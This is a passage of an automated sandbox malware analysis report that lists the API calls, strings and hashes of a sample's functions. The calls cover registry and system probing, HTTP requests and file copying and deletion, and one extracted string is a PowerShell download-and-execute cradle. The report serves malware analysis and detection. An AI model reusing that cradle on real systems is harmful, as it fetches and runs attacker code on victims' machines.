                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe$0y
                                          • API String ID: 3031569214-2336628047
                                          • Opcode ID: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                          • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                          • Opcode Fuzzy Hash: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                          • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 022D6BD3
                                          • sscanf.NTDLL ref: 022D6C00
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022D6C19
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022D6C27
                                          • ExitProcess.KERNEL32 ref: 022D6C41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID: (*y
                                          • API String ID: 2533653975-2410531834
                                          • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                          • Instruction ID: 5d742914603963e02bde85a0a15a123985868ebc3524d6484161b29ab52efd21
                                          • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                          • Instruction Fuzzy Hash: 9621CBB5D14209AFCF08EFE4E9459EEB7BAFF48300F04852EE516A3254EB345605CB65
                                          APIs
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                          • wsprintfA.USER32 ref: 00418459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • RegQueryValueExA.ADVAPI32(00000000,007997C0,00000000,000F003F,?,00000400), ref: 004184EC
                                          • lstrlenA.KERNEL32(?), ref: 00418501
                                          • RegQueryValueExA.ADVAPI32(00000000,007995E0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 3896182533-4073750446
                                          • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                          • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                          • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                          • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A51
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A68
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A7F
                                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022C4AA0
                                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 022C4AB0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ??2@$CrackInternetlstrlen
                                          • String ID: <
                                          • API String ID: 1683549937-4251816714
                                          • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                          • Instruction ID: 234a53811bea5a20c2d795ff0bc65c058d58e4d0b100df90bd252466c4027478
                                          • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                          • Instruction Fuzzy Hash: CF2158B5D00219ABDF10DFA4E849AED7B75FF04320F108229F965AB290EB706A05CF91
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D790B
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D7912
                                          • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022D7944
                                          • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022D7965
                                          • RegCloseKey.ADVAPI32(00000000), ref: 022D796F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID: Windows 11
                                          • API String ID: 3225020163-2517555085
                                          • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction ID: 12f4d9cac376aa0c841d81b3b397fe37f33113f2abcb6f12714f1e58605ed220
                                          • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction Fuzzy Hash: 91012CB9A80205BBEB10DBE0DD49FADB7B9EB48701F109154BA0596284D6789900CB51
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                          • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                          • RegOpenKeyExA.ADVAPI32(80000002,00795890,00000000,00020119,00000000), ref: 004176DD
                                          • RegQueryValueExA.ADVAPI32(00000000,00799778,00000000,00000000,?,000000FF), ref: 004176FE
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID: Windows 11
                                          • API String ID: 3466090806-2517555085
                                          • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                          • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                          • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                          • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                          • RegOpenKeyExA.ADVAPI32(80000002,00795890,00000000,00020119,004176B9), ref: 0041775B
                                          • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                          • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                          • String ID: CurrentBuildNumber
                                          • API String ID: 3466090806-1022791448
                                          • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                          • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                          • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                          APIs
                                          • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                          • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                          • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSize
                                          • String ID: :A$:A
                                          • API String ID: 1378416451-1974578005
                                          • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                          • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                          • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022C75A1
                                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022C7618
                                          • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022C7674
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 022C76B9
                                          • HeapFree.KERNEL32(00000000), ref: 022C76C0
                                            • Part of subcall function 022C94A7: vsprintf_s.MSVCRT ref: 022C94C2
                                          • task.LIBCPMTD ref: 022C77BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                          • String ID:
                                          • API String ID: 700816787-0
                                          • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                          • Instruction ID: 9232acfccf036aecaeebdebe8db97f31d86f336d2e10cd86951b4d8df1e6ef65
                                          • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                          • Instruction Fuzzy Hash: 98612DB591026C9BDB25DB90CC44FE9B7BDBF44300F1082E9E689A6148DBB05BC9CF95
                                          APIs
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022C6548
                                            • Part of subcall function 022C64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022C656A
                                            • Part of subcall function 022C64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022C659C
                                            • Part of subcall function 022C64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022C65EC
                                            • Part of subcall function 022C64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022C6626
                                            • Part of subcall function 022C64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022C6638
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022D557F
                                          • lstrlen.KERNEL32(00000000), ref: 022D5596
                                            • Part of subcall function 022D9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022D90B9
                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 022D55CB
                                          • lstrlen.KERNEL32(00000000), ref: 022D55EA
                                          • strtok.MSVCRT(00000000,?), ref: 022D5605
                                          • lstrlen.KERNEL32(00000000), ref: 022D5615
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                          • String ID:
                                          • API String ID: 3532888709-0
                                          • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                          • Instruction ID: 68ecdfb5b74506e8455de4ac8ce59cce2ff07938269071fc3bc905a0bcd29a07
                                          • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                          • Instruction Fuzzy Hash: F2510A709203489BCB28FFE4CE95EED7776AF10300F944128E80A66598DF786B45CF51
                                          APIs
                                          • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022D7345
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,022D7574,004205BD), ref: 022D7383
                                          • memset.MSVCRT ref: 022D73D1
                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022D7525
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: OpenProcesslstrcpymemset
                                          • String ID:
                                          • API String ID: 224852652-0
                                          • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                          • Instruction ID: 23231c748aca87a2665192176df003d4ac8e2b60e4bcc6cdbfa40daaac92382e
                                          • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                          • Instruction Fuzzy Hash: 72518FB0C203199BDB24DBE4DC84FEDF775AF44305F5081A9E605A7184DB786A84CF59
                                          APIs
                                          • memset.MSVCRT ref: 022D433C
                                          • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022D435B
                                          • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022D437F
                                          • RegCloseKey.ADVAPI32(?), ref: 022D4389
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D43AE
                                          • lstrcat.KERNEL32(?,0064A168), ref: 022D43C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseOpenQueryValuememset
                                          • String ID:
                                          • API String ID: 2623679115-0
                                          • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                          • Instruction ID: 71a3bdf87d741c963cda8206cffe5f162004daece1fa3c382b41da527270d3fe
                                          • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                          • Instruction Fuzzy Hash: 914187B69502087BDB14FBE0DC46FEE737EAB49300F00465CA61957184EA759798CFE2
                                          APIs
                                          • memset.MSVCRT ref: 004140D5
                                          • RegOpenKeyExA.ADVAPI32(80000001,00799AE0,00000000,00020119,?), ref: 004140F4
                                          • RegQueryValueExA.ADVAPI32(?,0079ABD0,00000000,00000000,00000000,000000FF), ref: 00414118
                                          • RegCloseKey.ADVAPI32(?), ref: 00414122
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                          • lstrcatA.KERNEL32(?,0079AAB0), ref: 0041415B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseOpenQueryValuememset
                                          • String ID:
                                          • API String ID: 2623679115-0
                                          • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                          • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                          • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                          • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                          APIs
                                          • strtok_s.MSVCRT ref: 00413588
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • strtok_s.MSVCRT ref: 004136D1
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00792F70,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpystrtok_s$lstrlen
                                          • String ID:
                                          • API String ID: 3184129880-0
                                          • Opcode ID: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                          • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                          • Opcode Fuzzy Hash: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                          • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022D8DC7: GetSystemTime.KERNEL32(00420E1A,xJy,004205AE,?,?,022C1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022D8DED
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022CA548
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 022CA666
                                          • lstrlen.KERNEL32(00000000), ref: 022CA923
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022CA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022CA094
                                          • DeleteFileA.KERNEL32(00000000), ref: 022CA9AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                          • String ID: ay
                                          • API String ID: 257331557-2970486754
                                          • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                          • Instruction ID: 796c62f6f92bde2cf6ea2ce81806aef95fe6b9aaf45c46bed1336c7533e9e8e6
                                          • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                          • Instruction Fuzzy Hash: E4E1F0729203189BCB18FBE4DD91DEEB33AAF24300F548659E156B2194EF346B48CF61
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00794A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                          • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                          • String ID: ay
                                          • API String ID: 257331557-2970486754
                                          • Opcode ID: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                          • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                          • Opcode Fuzzy Hash: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                          • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                          APIs
                                          • __lock.LIBCMT ref: 0041B39A
                                            • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                            • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                            • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                          • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                          • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                            • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                          • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
